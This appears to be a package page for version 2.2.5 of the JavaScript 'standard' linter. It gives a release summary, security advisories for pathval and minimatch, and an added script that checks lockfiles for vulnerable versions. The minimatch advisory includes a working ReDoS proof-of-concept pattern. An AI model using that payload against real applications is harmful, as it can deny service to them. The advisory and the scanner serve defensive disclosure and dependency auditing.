Standard version 2.2.5 is a minor release update to the popular JavaScript Standard Style linter, succeeding version 2.2.4. Both versions share the same core functionality and dependencies, including crucial tools like glob for file pattern matching, jscs and eslint for enforcing code style rules, jshint for identifying potential errors, and minimist for argument parsing. Development dependencies like mkdirp, rimraf, extend.js, and run-series also remain consistent, indicating no significant changes to the package's build process or tooling.
The key distinction lies in the release date. Version 2.2.5 was published shortly after version 2.2.4, suggesting a quick patch or minor adjustment. Developers switching from 2.2.4 to 2.2.5 should anticipate only very subtle changes, potentially a bug fix, a minor performance improvement, or an update to internal configuration with no impact on usage. Since the dependencies are unchanged, the upgrade appears low-risk. Given the rapid release cycle, however, test the update thoroughly to make sure no subtle or hidden behavior changes were introduced. Standard's commitment to consistent coding style is maintained in both versions, helping teams enforce unified JavaScript code conventions effortlessly.
All vulnerabilities related to version 2.2.5 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
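The pathval and minimatch advisories above each name a first fixed version (1.1.1 and 3.0.2). The following is an added example, not code from the standard package or from the advisories, that scans a lockfileVersion 2/3 package-lock.json "packages" map for installs below those versions, including nested copies such as the minimatch pulled in by glob; the lockfile fragment it runs on is constructed for illustration.

```javascript
// Scan a package-lock.json (lockfileVersion 2/3) "packages" map for the two
// fixed-version advisories listed above and flag any install below the fix.
const ADVISORIES = [
  { name: 'pathval', fixed: '1.1.1', summary: 'prototype pollution' },
  { name: 'minimatch', fixed: '3.0.2', summary: 'ReDoS via pattern argument' },
];

// Numeric compare of "major.minor.patch"; a pre-release suffix is ignored.
function compareVersions(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// "node_modules/glob/node_modules/minimatch" -> "minimatch"
function packageName(key) {
  const parts = key.split('node_modules/');
  return parts[parts.length - 1];
}

// One finding per vulnerable install path (nested copies count too).
function findVulnerable(lock) {
  const findings = [];
  for (const [key, meta] of Object.entries(lock.packages || {})) {
    if (key === '') continue; // the root project entry
    const name = packageName(key);
    for (const adv of ADVISORIES) {
      if (name === adv.name && compareVersions(meta.version, adv.fixed) < 0) {
        findings.push({ path: key, version: meta.version, fixed: adv.fixed, summary: adv.summary });
      }
    }
  }
  return findings;
}

// Constructed lockfile fragment (not a real project's lockfile).
const SAMPLE_LOCK = { packages: {
  '': { name: 'example-app', version: '1.0.0' },
  'node_modules/minimatch': { version: '3.0.4' },
  'node_modules/glob/node_modules/minimatch': { version: '2.0.10' },
  'node_modules/pathval': { version: '1.1.0' },
} };

for (const f of findVulnerable(SAMPLE_LOCK)) {
  console.log(`${f.path}@${f.version}: ${f.summary}; fixed in ${f.fixed}`);
}
```

To run it against a real project, replace SAMPLE_LOCK with `JSON.parse(require('fs').readFileSync('package-lock.json', 'utf8'))`; the braceExpand advisory is not checked because the page gives no fixed version for it.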